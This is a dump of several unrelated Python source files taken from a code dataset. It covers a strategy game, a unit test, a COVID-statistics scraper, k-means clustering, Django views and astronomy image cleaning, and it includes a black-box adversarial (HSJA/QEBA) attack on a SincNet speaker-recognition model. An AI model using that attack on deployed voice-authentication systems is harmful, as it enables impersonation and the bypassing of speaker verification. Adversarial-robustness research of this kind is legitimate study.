self.camps[i].spend_money(strength):\n self.armament(self.camps[i], strength)\n elif choice == \"INVADE\":\n self.invade(self.camps[i], self.camps[target])\n else:\n sys.stderr.writelines(\"存在しないアクションが指定されました:\" + str(i))\n\n return self.isFinished()\n \n def draw(self):\n print(str(self.turn) + \"ターン目\")\n for i in range(len(self.camps)):\n print(\"陣営:\" + self.camps[i].camp_name + \", 領域:\" + str([j.name for j in self.get_our_nodes(i)]) + \\\n \", 資金:\" + str(round(self.camps[i].money)) + \", 軍事力:\" + str(round(self.camps[i].mil_power)) + \", 国力:\" + str(round(self.get_sum_prosperity(i))))\n\n def boost(self, node, money):\n EFFICIENCY = 0.5\n node.prosperity += money * EFFICIENCY\n \n def armament(self, camp, money):\n EFFICIENCY = 1.0\n camp.mil_power += money * EFFICIENCY\n \n def invade(self, attacker, defencer):\n DEF_EFFICIENCY = 2.0\n\n \n def get_node(self, node_id):\n if node_id >= len(self.entire_map):\n sys.stderr.writelines(\"存在しないマップノード番号が指定されました:\" + str(node_id))\n return self.entire_map[node_id]\n \n def get_our_nodes(self, camp_id):\n return [i for i in self.entire_map if i.ruler == camp_id]\n \n def get_empty_nodes(self):\n return [i for i in self.entire_map if i.ruler == None]\n \n def get_sum_prosperity(self, camp_id):\n return sum([i.prosperity for i in self.get_our_nodes(camp_id)])\n\n def get_neighbor_camps(self, camp_id):\n # 隣接するノードの列挙\n neighbors_id = []\n for m in self.get_our_nodes(camp_id):\n add = [i.node_id for i in m.neighbor_nodes]\n for a in add:\n if a not in neighbors_id:\n neighbors_id.append(a)\n return [self.get_node(i) for i in neighbors_id]\n\n def make_entire_map(self, map_size):\n answer = [Map_node(i) for i in range(map_size)]\n # 暫定的に環状のネットワークを作成する\n for i in range(map_size):\n if i < map_size-1:\n answer[i].neighbor_nodes.append(answer[i+1])\n answer[i+1].neighbor_nodes.append(answer[i])\n else:\n answer[i].neighbor_nodes.append(answer[0])\n answer[0].neighbor_nodes.append(answer[i])\n return answer\n\n def isFinished(self):\n return self.turn >= 10\n \n def who_is_strongest(self):\n return max([i.mil_power for i in self.camps])\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640593872","text":"import unittest\nfrom unittest.mock import MagicMock\n\nimport datetime\nfrom complex_meas_processor.CpxCalculator import CpxCalculator\nfrom complex_meas_processor.MeasurementDef import MeasurementDef\n\n\nclass TestCpxCalculatorTest(unittest.TestCase):\n def test_Calculator(self):\n Y = 2018\n M = 6\n D = 13\n MS = 0\n startMinute = 0\n endMinute = 6\n lastCalcTime = datetime.datetime(Y, M, D, 17, startMinute, 0, MS)\n window = 61 * 2\n interval = 20\n measDef = MeasurementDef(\n \"boring_cabbage\",\n \"myMetricId\",\n \"CPU_USAGE\",\n window,\n interval,\n lastCalcTime,\n \"dummy description\",\n )\n cpxCalculator = CpxCalculator(measDef)\n\n sensorInterval = 30\n numOfMeasures = 10\n simpleMeasurements = [\n [\n i,\n lastCalcTime\n + datetime.timedelta(seconds=i * sensorInterval),\n ]\n for i in range(numOfMeasures)\n ]\n calculationTime = datetime.datetime(Y, M, D, 17, endMinute, 0, MS)\n cpxMeasurements = cpxCalculator.calculate(\n simpleMeasurements, calculationTime\n )\n\n self.assertEqual(\n len(cpxMeasurements),\n ((endMinute - startMinute) * 60 - window) // measDef.interval\n + 1,\n )\n\n self.assertAlmostEqual(cpxMeasurements[0][0], 2.5)\n self.assertAlmostEqual(cpxMeasurements[1][0], 2.5)\n self.assertAlmostEqual(cpxMeasurements[2][0], 3.5)\n self.assertAlmostEqual(cpxMeasurements[3][0], 4.5)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"complex_meas_processor/CpxCalculatorTest.py","file_name":"CpxCalculatorTest.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530393494","text":"from __future__ import (absolute_import, division,\r\n print_function, unicode_literals)\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, label, child0=None, child1=None, child2=None, child3=None):\r\n self.label = label\r\n self.tokens = list()\r\n self.children = list()\r\n\r\n\r\ndef print_tree(node, level=0):\r\n if node is not None:\r\n padding = ' ' * level * 4\r\n print('{} {}'.format(padding, node.label))\r\n print('{} {}'.format(padding, '|'.join([str(tk) for tk in node.tokens])))\r\n for child in node.children:\r\n print_tree(child, level + 1)\r\n","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71030844","text":"\"\"\"\n\n- This script is scraping Worldometer website.\n- This aims ready to use.\n- For step by step and details, Worldometer.ipynb is preferable.\n\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nbase_url = 'https://www.worldometers.info/coronavirus/'\n\ncountry = input('Enter country: ')\nurl = base_url + '/country/' + country\n\n# fetch HTML data\nhtml_text = requests.get(url).text\n\n# parse HTML text using 'lxml'\nsoup = BeautifulSoup(html_text, 'lxml')\nprint(soup.prettify())\n\ninfo_divs = soup.find('div', class_=\"content-inner\").findAll('div', id='maincounter-wrap')\nprint(info_divs)\n\nfor block in info_divs[:3]:\n title = block.h1.text\n number = block.span.text\n print(title, number)","sub_path":"worldometer.py","file_name":"worldometer.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"473373954","text":"\"\"\"\n This class provide general structure of fitpanel page\n\"\"\"\nimport wx\nfrom sas.sasgui.guiframe.panel_base import PanelBase\n\nclass HintFitPage(wx.ScrolledWindow, PanelBase):\n \"\"\"\n This class provide general structure of fitpanel page\n \"\"\"\n ## Internal name for the AUI manager\n window_name = \"Hint Page\"\n ## Title to appear on top of the window\n window_caption = \"Hint page \"\n\n def __init__(self, parent):\n wx.ScrolledWindow.__init__(self, parent,\n style=wx.FULL_REPAINT_ON_RESIZE)\n PanelBase.__init__(self, parent)\n msg = \"right click on the data when it is highlighted \"\n msg += \"the select option to fit for futher options\"\n self.do_layout()\n\n def do_layout(self):\n \"\"\"\n Draw the page\n \"\"\"\n name = \"Hint\"\n box_description = wx.StaticBox(self, wx.ID_ANY, name)\n boxsizer = wx.StaticBoxSizer(box_description, wx.VERTICAL)\n msg = \" How to link data to the control panel: \\n \\n\"\n msg += \" First load data file from 'File' menu. \\n\"\n msg += \" Then Highlight and right click on the data plot. \\n\"\n msg += \" Finally, select 'Select data for fitting' in the pop-up menu. \\n\"\n self.hint_txt = wx.StaticText(self, wx.ID_ANY, msg, style=wx.ALIGN_LEFT)\n boxsizer.Add(self.hint_txt, wx.ALL | wx.EXPAND, 20)\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n self.vbox.Add(boxsizer)\n self.vbox.Layout()\n self.vbox.Fit(self)\n self.SetSizer(self.vbox)\n self.SetScrollbars(20, 20, 25, 65)\n self.Layout()\n\n def createMemento(self):\n return\n\n\nclass HelpWindow(wx.Frame):\n def __init__(self, parent, id, title):\n wx.Frame.__init__(self, parent, id, title, size=(570, 400))\n\n self.page = HintFitPage(self)\n self.Centre()\n self.Show(True)\n","sub_path":"src/sas/sasgui/perspectives/fitting/hint_fitpage.py","file_name":"hint_fitpage.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415472926","text":"import numpy as np\nimport pandas as pd\n\nimport pickle\n\ndef document_vector_matrix(df):\n\n\t#\n\t#\tRead Document IDs and Create DocId to Row Map\n\t#\n\n\t# docIDs\n\tdocIDs = []\n\tfor did in df[['docID']].values.tolist():\n\t\tdocIDs.append(did[0])\n\n\t# num rows in matrix \n\tnrows = len(docIDs)\n\n\t# doc2row map\n\trows = range(0, nrows)\n\tdoc2row = dict(zip(docIDs, rows))\n\n\t#\n\t#\tRead Document Texts and Create Unique Word to Column Map\n\t#\n\n\t# unique words\n\tcorpus = ''\n\tdocument_texts = []\n\tfor sentence in df[['document text']].values.tolist():\n\t\tcorpus += sentence[0] + ' '\n\t\tdocument_texts.append(sentence[0].split(' '))\n\tunique_words = list(set(corpus.split(' ')))\n\n\t# filter lengths < 1 (TMP MESS)\n\tunique_words = [w for w in unique_words if len(w) > 0]\n\tfor sentence in document_texts:\n\t\tsentence = [w for w in sentence if len(w) > 0]\n\n\t# num columns in matrix\n\tncols = len(unique_words)\n\n\t# word2column map\n\tcolumns = range(0, ncols)\n\tword2column = dict(zip(unique_words, columns))\n\n\t#\n\t#\tCreate Document Vector Matrix\n\t#\n\n\t# create empty matrix\n\tM = np.zeros((nrows, ncols), dtype=np.int64)\n\n\t# fill matrix\n\tfor row in range(0, nrows):\n\t\tfor word in document_texts[row]:\n\t\t\tcol = word2column[word]\n\t\t\tM[row,col] += 1\n\n\n\t# return M (matrix), doc2row (map), word2column (map)\n\treturn M, doc2row, word2column\n\ndef nearest_centroid(vector, matrix_centroid_vectors):\n\n\t# specs\n\tk = matrix_centroid_vectors.shape[0]\n\tdim = vector.shape[0]\n\n\t# find smallest Frobenius norm of row vectors in matrix_distance_vectors\n\tdistance_vector_template = np.zeros(dim)\n\tmatrix_distance_vectors = np.zeros(matrix_centroid_vectors.shape)\n\n\t# find distance between given vector and each centroid vector\n\tfor centroid_vector_index in range(0,k):\n\t\tdiff = np.subtract(vector, matrix_centroid_vectors[centroid_vector_index])\n\t\tmatrix_distance_vectors[centroid_vector_index,:] = diff\n\n\t# find the index of the nearest centroid in matrix_centroid_vectors and return\n\tcentroid_distances = np.linalg.norm(matrix_distance_vectors, axis=1)\n\tindex_nearest_centroid = centroid_distances.argmin()\n\treturn index_nearest_centroid\n\n# returns vector with indeces of closest centroid for each row vector in vector matrix\ndef nearest_centroid_vector(vector_matrix, matrix_centroid_vectors):\n\n\tnum_vectors = vector_matrix.shape[0] # num rows (row vectors)\n\tnc_vector = np.zeros(num_vectors)\t # nearest centroid vector\n\n\tfor vector_index in range(0, num_vectors):\n\t\tvector = vector_matrix[vector_index]\n\t\tnc_vector[vector_index] = nearest_centroid(vector, matrix_centroid_vectors)\n\n\treturn nc_vector\n\ndef update_centroids(vector_matrix, matrix_centroid_vectors): \n\n\tk = matrix_centroid_vectors.shape[0]\n\tnum_vectors = vector_matrix.shape[0] # num rows (row vectors)\n\tnc_vector = nearest_centroid_vector(vector_matrix, matrix_centroid_vectors) # nearest centroid vector\n\n\t# find new centroid centers\n\tfor centroid_index in range(0, k):\n\n\t\t# find vectors with the current centroid as their closest centroid\n\t\tmember_vector_indices = np.where(nc_vector == centroid_index)[0]\n\t\tmember_vectors = vector_matrix[member_vector_indices]\n\n\t\t# find vector group's center\n\t\tupdated_centroid_vector = np.mean(member_vectors,axis=0)\n\n\t\t# update matrix of centroid vectors\n\t\tmatrix_centroid_vectors[centroid_index,:] = updated_centroid_vector\n\n\n\t# return updated centroids\n\treturn matrix_centroid_vectors\n\n\ndef kmeans(vector_matrix, k, max_iters):\n\n\tdim = vector_matrix.shape[1]\n\tmaximum = np.max(vector_matrix)\n\tminimum = np.min(vector_matrix)\n\n\t# initilize centroids randomly\n\tmatrix_centroid_vectors = np.random.uniform(low=minimum, high=maximum, size=(k,dim))\n\tprevious_centroids = matrix_centroid_vectors\n\n\t# initilize iteration count\n\tcount = 1\n\n\t# run algorithm\n\twhile (count <= max_iters):\n\t\tmatrix_centroid_vectors = update_centroids(vector_matrix, matrix_centroid_vectors)\n\n\t\t# break if centroid vectors are the same\n\t\tif np.array_equal(matrix_centroid_vectors, previous_centroids):\n\t\t\treturn matrix_centroid_vectors, count\n\n\t\tprevious_centroids = matrix_centroid_vectors\n\n\t\tcount += 1\n\n\treturn matrix_centroid_vectors, count\n\n#\n# Start\n#\n\n# read question 4 csv\ndoc = \"Question_4.csv\"\ndf = pd.read_csv(doc, header=0, dtype={'docID' : np.int64, 'document text':str}) \n\n# create document vector matrix\nM, doc2row, word2column = document_vector_matrix(df)\n\n\n# testing save and load M for consistant results\n\n\n# save\n\npd.DataFrame(data=M).to_csv(\"M.csv\", index=False)\n\noutput = open('doc2row.pkl', 'wb')\npickle.dump(doc2row, output)\noutput.close()\n\noutput = open('word2column.pkl', 'wb')\npickle.dump(word2column, output)\noutput.close()\n\n\n# load\n\nM = pd.read_csv(\"M.csv\").values\n\npkl_file = open('doc2row.pkl', 'rb')\ndoc2row = pickle.load(pkl_file)\npkl_file.close()\n\npkl_file = open('word2column.pkl', 'rb')\nword2column = pickle.load(pkl_file)\npkl_file.close()\n\nprint(M)\nprint(word2column)\n\n\n#\n# Kmeans\n#\n\n\n# note uses row vector matrices\n# testing \nnum_trials = 10\nfor i in range(0,num_trials):\n\tprint(kmeans(M, 2, 100))\n\n\n","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"641800052","text":"# -*- coding: UTF-8 -*-\nimport utils.Sincnet as Sincnet\nimport torch\nimport numpy as np\nimport scipy.fftpack as ffp\nimport soundfile as sf\nclass HSJA(object):\n def __init__(self,MODE,SAVE_DIR_PATH,query_num,interval, num_iterations=2000, gamma=1.0,\n stepsize_search='geometric_progression',\n max_num_evals=1e4, init_num_evals=100,query_limit=25000, verbose=True):\n self.model = Sincnet.get_speaker_model(MODE)\n self.num_iterations = num_iterations\n self.gamma = gamma\n self.stepsize_search = stepsize_search\n self.max_num_evals = max_num_evals\n self.init_num_evals = init_num_evals\n self.verbose = verbose\n self.SAVE_DIR_PATH=SAVE_DIR_PATH\n self.query_num=query_num\n self.query_limit=query_limit\n self.interval=interval\n self.dct = lambda x: ffp.dct(x, norm='ortho')\n self.idct = lambda ix: ffp.idct(ix, norm='ortho')\n\n def hsja(self, input_xi, label_or_target, initial_xi):\n # Set parameters\n # original_label = np.argmax(self.model.predict_label(input_xi))\n d = int((self.interval[1]-self.interval[0])*self.dct_field)\n # Set binary search threshold.\n theta = self.gamma / (np.sqrt(d) * d)\n\n # Initialize.\n perturbed = initial_xi\n\n # Project the initialization to the boundary.\n perturbed, dist_post_update = self.binary_search_batch(input_xi, perturbed, label_or_target, theta)\n dist = self.compute_distance(perturbed, input_xi)\n\n for j in np.arange(self.num_iterations):\n # params['cur_iter'] = j + 1\n\n # Choose delta.\n if j == 1:\n delta = 0.2\n else:\n delta = np.sqrt(d) * theta * dist_post_update\n num_evals = int(self.init_num_evals * np.sqrt(j + 1))\n num_evals = int(min([num_evals, self.max_num_evals]))\n\n # approximate gradient.\n gradf = self.approximate_gradient(perturbed, label_or_target, num_evals,\n delta)\n update = gradf\n\n # search step size.\n if self.stepsize_search == 'geometric_progression':\n # find step size.\n epsilon = self.geometric_progression_for_stepsize(perturbed, label_or_target,\n update, dist, j + 1)\n\n # Update the sample.\n perturbed = self.clip_image(perturbed + epsilon * update)\n\n # Binary search to return to the boundary.\n perturbed, dist_post_update = self.binary_search_batch(input_xi,\n perturbed[None], label_or_target, theta)\n\n elif self.stepsize_search == 'grid_search':\n # Grid search for stepsize.\n epsilons = np.logspace(-4, 0, num=20, endpoint=True) * dist\n epsilons_shape = [20] + len(input_xi.shape) * [1]\n perturbeds = perturbed + epsilons.reshape(epsilons_shape) * update\n perturbeds = self.clip_image(perturbeds)\n idx_perturbed = self.decision_function(perturbeds, label_or_target)\n\n if np.sum(idx_perturbed) > 0:\n # Select the perturbation that yields the minimum distance # after binary search.\n perturbed, dist_post_update = self.binary_search_batch(input_xi,\n perturbeds[idx_perturbed], label_or_target,\n theta)\n\n # compute new distance.\n dist = self.compute_distance(perturbed, input_xi)\n if self.verbose:\n with open(self.SAVE_DIR_PATH, 'a+', encoding='utf-8') as f:\n f.write(\"{}\\t{}\\n\".format(self.query_num,dist ))\n print('iteration: {:d}, distance {:.4E}'.format(j + 1, dist))\n if self.query_num>self.query_limit:\n break\n sf.write(r\"F:\\SR-ATK\\show\\expQEBA\\fake_{}_{}.wav\".format(self.query_num, np.linalg.norm(perturbed - input_xi)),perturbed.squeeze(),16000)\n\n return perturbed\n\n def predict_one_label(self,data):\n self.query_num+=1\n data=data.squeeze()\n pred_real, pred_pro = Sincnet.sentence_test(self.model,\n torch.from_numpy(data).float().cuda())\n return pred_real\n def predict_more_label(self,datas):\n preds=[]\n for item in datas:\n preds.append(self.predict_one_label(item))\n return np.array(preds)\n def decision_function(self, images, label):\n \"\"\"\n Decision function output 1 on the desired side of the boundary,\n 0 otherwise.\n \"\"\"\n la=self.predict_more_label(images)\n la=np.array(la)\n return (la == label)\n\n\n def clip_image(self, image, clip_min=-1, clip_max=1):\n # Clip an image, or an image batch, with upper and lower threshold.\n return np.minimum(np.maximum(clip_min, image), clip_max)\n\n def compute_distance(self, x_ori, x_pert):\n # Compute the distance between two images.\n return np.linalg.norm(x_ori - x_pert)\n\n def dct_p_to_all(self,dct_p):\n \"\"\"\n :param dct_p:(n,1,dl)\n :return: (n,1,16000)\n \"\"\"\n length=len(dct_p.shape)\n shp=list(dct_p.shape)\n shp[-1]=16000\n res=np.zeros(shp)\n lr=int(self.dct_field*(self.interval[1]-self.interval[0]))\n if length == 3:\n res[:,:,:lr]=dct_p[:,:,:]\n else:\n res[:, :lr] =dct_p[:, :]\n return self.idct(res)\n\n def approximate_gradient(self, sample, label_or_target, num_evals, delta):\n\n # Generate random vectors.\n noise_shape = [num_evals,1,int(self.dct_field*(self.interval[1]-self.interval[0]))]\n rv = np.random.randn(*noise_shape)\n rv=self.dct_p_to_all(rv)\n rv[:,:,:self.interval[0]]=0\n rv[:, :, self.interval[1]:] = 0\n\n rv = rv / np.sqrt(np.sum(rv ** 2, axis=(1, 2), keepdims=True))\n perturbed = sample + delta * rv\n perturbed = self.clip_image(perturbed)\n rv = (perturbed - sample) / delta\n\n # query the model.\n decisions = self.decision_function(perturbed, label_or_target)\n decision_shape = [len(decisions)] + [1] * len(sample.shape)\n fval = 2 * decisions.astype(float).reshape(decision_shape) - 1.0\n\n # Baseline subtraction (when fval differs)\n if np.mean(fval) == 1.0: # label changes.\n gradf = np.mean(rv, axis=0)\n elif np.mean(fval) == -1.0: # label not change.\n gradf = - np.mean(rv, axis=0)\n else:\n fval -= np.mean(fval)\n gradf = np.mean(fval * rv, axis=0)\n\n # Get the gradient direction.\n gradf = gradf / np.linalg.norm(gradf)\n\n return gradf\n\n def project(self, original_image, perturbed_images, alphas):\n alphas_shape = [1] * len(original_image.shape)\n alphas = alphas.reshape(alphas_shape)\n return (1 - alphas) * original_image + alphas * perturbed_images\n\n\n def binary_search_batch(self, original_image, perturbed_images, label_or_target, theta):\n \"\"\" Binary search to approach the boundar. \"\"\"\n\n # Compute distance between each of perturbed image and original image.\n dists_post_update = np.array([\n self.compute_distance(\n original_image,\n perturbed_image\n )\n for perturbed_image in perturbed_images])\n # print(dists_post_update)\n # Choose upper thresholds in binary searchs based on constraint.\n highs = np.ones(len(perturbed_images))\n thresholds = theta\n\n lows = np.zeros(len(perturbed_images))\n\n # Call recursive function.\n while np.max((highs - lows) / thresholds) > 1:\n # projection to mids.\n mids = (highs + lows) / 2.0\n mid_images = self.project(original_image, perturbed_images, mids)\n # print(mid_images.shape)\n # Update highs and lows based on model decisions.\n decisions = self.decision_function(mid_images, label_or_target)\n lows = np.where(decisions == 0, mids, lows)\n highs = np.where(decisions == 1, mids, highs)\n\n out_images = self.project(original_image, perturbed_images, highs)\n\n # Compute distance of the output image to select the best choice.\n # (only used when stepsize_search is grid_search.)\n dists = np.array([\n self.compute_distance(\n original_image,\n out_image\n )\n for out_image in out_images])\n idx = np.argmin(dists)\n\n dist = dists_post_update[idx]\n out_image = out_images[idx]\n return out_image, dist\n\n\n def geometric_progression_for_stepsize(self, x, label_or_target, update, dist, j):\n \"\"\"\n Geometric progression to search for stepsize.\n Keep decreasing stepsize by half until reaching\n the desired side of the boundary,\n \"\"\"\n epsilon = dist / np.sqrt(j)\n\n def phi(epsilon):\n new = x + epsilon * update\n success = self.decision_function(new, label_or_target)\n return success\n\n while not phi(epsilon):\n epsilon /= 2.0\n\n return epsilon\n\n def __call__(self, input_xi, label_or_target, initial_xi,dct_field):\n self.dct_field=dct_field\n label_or_target = np.array([label_or_target])\n adv = self.hsja(input_xi, label_or_target, initial_xi)\n return adv.squeeze()\n\n\n\n\n","sub_path":"QEBA_F.py","file_name":"QEBA_F.py","file_ext":"py","file_size_in_byte":9800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"509858869","text":"# desc: facebook telephone interview task, 7/4/2014\n#\n# Goat Latin is a made-up language based off of English, sort of like Pig Latin. The rules of Goat Latin are as follows:\n# 1. If a word begins with a consonant (i.e. not a vowel), remove the first letter and append it to the end, then add 'ma'.\n# For example, the word 'goat' becomes 'oatgma'.\n# 2. If a word begins with a vowel, append 'ma' to the end of the word.\n# For example, the word 'I' becomes 'Ima'.\n# 3. Add one letter \"a\" to the end of each word per its word index in\n# the sentence, starting with 1. That is, the first word gets \"a\" added\n# to the end, the second word gets \"aa\" added to the end, the third word\n# in the sentence gets \"aaa\" added to the end, and so on.\n\n\n\nprint(\"Please enter a sentence: \", end=\"\")\nsentence = input()\nwords = sentence.split(\" \")\ntrailing = \"a\"\n\nfor word in words:\n if(word[0] in [\"a\",\"e\",\"i\",\"o\",\"u\"]):\n word = word + \"ma\"\n else:\n first_cha = word[0]\n word = word[1:]\n word = word + first_cha + \"ma\"\n\n word = word + trailing\n print(word)\n trailing = trailing + \"a\"\n\n# Note that the original words list is not modified. If the intent is to have the goat latin accessible outside the\n# for loop, then use an enumeration to loop through the list and modify 'words' list in place","sub_path":"goat_latin.py","file_name":"goat_latin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521435019","text":"from django import forms\nfrom django.views.generic import ListView\nfrom django.utils.translation import gettext as _\nfrom django.shortcuts import render\n\nfrom selia.views.utils.search_filter import SearchFilter\n\n\nclass SearchForm(forms.Form):\n search = forms.CharField(\n label=_('search'),\n max_length=100,\n required=False)\n\n\nclass SeliaListView(ListView):\n paginate_by = 10\n empty_message = _('Empty list')\n no_permission_template = 'selia_templates/generic/no_permission.html'\n\n def has_view_permission(self):\n return self.request.user.is_authenticated\n\n def has_create_permission(self):\n return True\n\n def no_permission_redirect(self):\n return render(self.request, self.no_permission_template)\n\n def clean_chain(self):\n self.request.session['chain'] = ''\n\n def get(self, *args, **kwargs):\n self.clean_chain()\n\n if not self.has_view_permission():\n return self.no_permission_redirect()\n\n return super().get(*args, **kwargs)\n\n def get_list_item_template(self):\n if hasattr(self, 'list_item_template'):\n return self.list_item_template\n\n return NotImplementedError('No template for list item was given')\n\n def get_filter_form_template(self):\n if hasattr(self, 'filter_form_template'):\n return self.filter_form_template\n\n return NotImplementedError('No template for filter form was given')\n\n def get_help_template(self):\n if hasattr(self, 'help_template'):\n return self.help_template\n\n raise NotImplementedError('No template for help was given')\n\n def get_search_form(self):\n return SearchForm(self.request.GET)\n\n def get_ordering_choices(self):\n orderings = []\n for field, label in self.ordering_fields:\n orderings.append(\n (\n '-{field}'.format(field=field),\n '{order} {label}'.format(\n label=label, order=_('↓'))\n )\n )\n\n orderings.append(\n (\n field,\n '{order} {label}'.format(\n label=label, order=_('↑'))\n )\n )\n return orderings\n\n def get_ordering_form(self):\n ordering_choices = self.get_ordering_choices()\n\n class OrderingForm(forms.Form):\n order = forms.ChoiceField(\n label=_('ordering'),\n choices=ordering_choices)\n\n ordering_form = OrderingForm(self.request.GET)\n return ordering_form\n\n def get_filter_class(self):\n if hasattr(self, 'filter_class'):\n return self.filter_class\n\n raise NotImplementedError('No filter class was provided')\n\n def get_initial_queryset(self):\n if hasattr(self, 'queryset'):\n return self.queryset\n\n raise NotImplementedError('No initial queryset was provided')\n\n def get_queryset(self):\n queryset = self.get_initial_queryset()\n return self.filter_queryset(queryset)\n\n def filter_queryset_with_query(self, queryset):\n try:\n filter_class = self.get_filter_class()\n self.filter = filter_class(\n self.request.GET,\n queryset=queryset,\n request=self.request)\n queryset = self.filter.qs\n except NotImplementedError:\n pass\n\n return queryset\n\n def filter_queryset_with_search(self, queryset):\n if hasattr(self, 'search_fields'):\n self.search_form = self.get_search_form()\n\n if self.search_form.is_valid():\n queryset = SearchFilter().filter_queryset(self.request, queryset, self)\n\n return queryset\n\n def order_queryset(self, queryset):\n if hasattr(self, 'ordering_fields'):\n self.order_form = self.get_ordering_form()\n\n if self.order_form.is_valid():\n ordering = self.order_form.data['order']\n queryset = queryset.order_by(ordering)\n\n return queryset\n\n def filter_queryset(self, queryset):\n queryset = self.filter_queryset_with_query(queryset)\n queryset = self.filter_queryset_with_search(queryset)\n return self.order_queryset(queryset)\n\n def get_permissions(self):\n return {\n 'create': self.has_create_permission()\n }\n\n def get_templates(self):\n return {\n 'help': self.get_help_template(),\n 'list_item': self.get_list_item_template(),\n 'filter_form': self.get_filter_form_template(),\n }\n\n def get_forms(self):\n forms = {}\n if hasattr(self, 'filter'):\n forms['filter'] = self.filter\n\n if hasattr(self, 'search_form'):\n forms['search'] = self.search_form\n\n if hasattr(self, 'order_form'):\n forms['order'] = self.order_form\n\n return forms\n\n def get_context_data(self, **kwargs):\n context = {'object_list': super().get_context_data(**kwargs)}\n context['forms'] = self.get_forms()\n context['templates'] = self.get_templates()\n context['permissions'] = self.get_permissions()\n return context\n","sub_path":"selia/views/list_views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"442530441","text":"from __future__ import print_function, division\nimport astropy.io.fits as pyfits\nimport numpy as np\nimport sys\nimport subprocess\nfrom scipy import signal\nimport weightedstats as ws\nfrom skimage.filters.rank import median as skmed\n\n\"\"\"\n__author__ = 'Will Hartley'\n\nCode to clean up the VISTA VIDEO single-chip coadds' backgrounds.\n\nSteps:\n- run sextractor, with some default set of params\n- expand segmentation map by 4 px (choice of 6px for 0.1342\" / px is optimal for UDS, VISTA pixels are 0.2636\"). Actually using a convolution with a square array\n- use expanded segmap as mask in a median filtering of the background\n- Filter is a simple square (129x129 px, i.e., 34x34 arcsec) \n- to make the algorithm run easier, we should embed the image in a larger array.\n\"\"\"\n\n# Image Object\n# properties: file_name, weightmap, size, weight_name, mask, cleaned_im, cleaned_name, conf (configuration constants - see __main__)\n# methods: run sextractor, embed image, make mask (inc. read segmap, expand segmap), clean image, save cleaned\n\nclass video_image:\n\n def __init__(self, fname, conf):\n\n self.fname = fname\n self.conf = conf\n\n # read the image, set-up weightmap filename\n self.read_image()\n\n\n def pad_array(self, im_array):\n # pad the array on all sides with the number of px in conf\n # and return the padded array\n pad_array = np.zeros((im_array.shape[0]+self.conf.pad_px*2,im_array.shape[1]+self.conf.pad_px*2))\n pad_array[self.conf.pad_px-1:pad_array.shape[0]-self.conf.pad_px-1, self.conf.pad_px-1:pad_array.shape[1]-self.conf.pad_px-1] = im_array\n return pad_array\n \n \n def read_image(self):\n # read header keywords and image data, pad image data, construct weightmap filename \n with pyfits.open(self.fname) as f:\n self.im_size = f[0].header['NAXIS2'], f[0].header['NAXIS1'] # axes switched in python w.r.t. fits expectation.\n self.im_data = self.pad_array(f[0].data)\n self.im_head = f[0].header\n self.weight_name = '.'.join(fname.split('.')[:-1])+'.weight.fits' # assumes weight extension, could allow this to change via conf.\n self.clean_name = '.'.join(fname.split('.')[:-1])+'.cleaned.fits'\n \n \n def run_sex(self):\n # run sextractor\n subprocess.call('sex -c VIDEO.sex {0} -WEIGHT_IMAGE {1}'.format(self.fname, self.weight_name), shell=True)\n\n\n def expand_seg(self, seg):\n seg = signal.convolve2d(seg, np.ones((self.conf.exp_seg,self.conf.exp_seg)), mode='same')\n seg = np.floor(seg/self.conf.exp_seg**2)\n return seg\n\n \n def save_mask(self):\n # save the mask\n hdu = pyfits.PrimaryHDU(self.mask)\n hdu.writeto('mask.fits', clobber=True)\n \n\n def read_mask(self):\n # read in segmap\n segmap = pyfits.open('seg.fits')[0].data\n \n # change values such that source pixels are 0 and background are 1\n segmap[segmap==1] = 2\n segmap[segmap==0] = 1\n segmap[segmap>1] = 0\n\n # expand sources in segmap by pre-defined amount\n segmap = self.expand_seg(segmap)\n\n # embed in larger array\n self.mask = self.pad_array(segmap)\n\n # mask border region\n self.mask[0:self.conf.pad_px+self.conf.border,:] = 0\n self.mask[self.mask.shape[0]-(1+self.conf.pad_px+self.conf.border):,:] = 0\n self.mask[:, 0:self.conf.pad_px+self.conf.border] = 0\n self.mask[:, self.mask.shape[1]-(1+self.conf.pad_px+self.conf.border):] = 0\n\n # For testing purposes, we might want to save the mask\n if self.conf.bug_check == True:\n self.save_mask()\n\n\n def save_bugcheck_im(self, im, name):\n # save the bugcheck image\n hdu = pyfits.PrimaryHDU(im)\n hdu.writeto(name, clobber=True)\n \n\n def clean_im_BAD(self):\n # THIS DOESN'T WORK AT ALL - BIT DEPTH IS INSUFFICIENT\n \n # using masked median filter from scikit\n # filter the image, rejecting source pixels and masked regions\n tmp_im = self.im_data\n tmp_im[self.mask==0] = 0.\n tmp_im[tmp_im > self.conf.clip] = self.conf.clip\n tmp_im[tmp_im < -1.* self.conf.clip] = -1. * self.conf.clip\n\n # if testing, save the temporary image\n if self.conf.bug_check == True:\n self.save_bugcheck_im(tmp_im, 'tmp.fits')\n\n # invert mask for use with the scikit function - don't need\n #self.mask = -1 * self.mask + 1 \n \n # scale to range (-1, 1)\n im_max = np.max(np.abs(tmp_im))\n 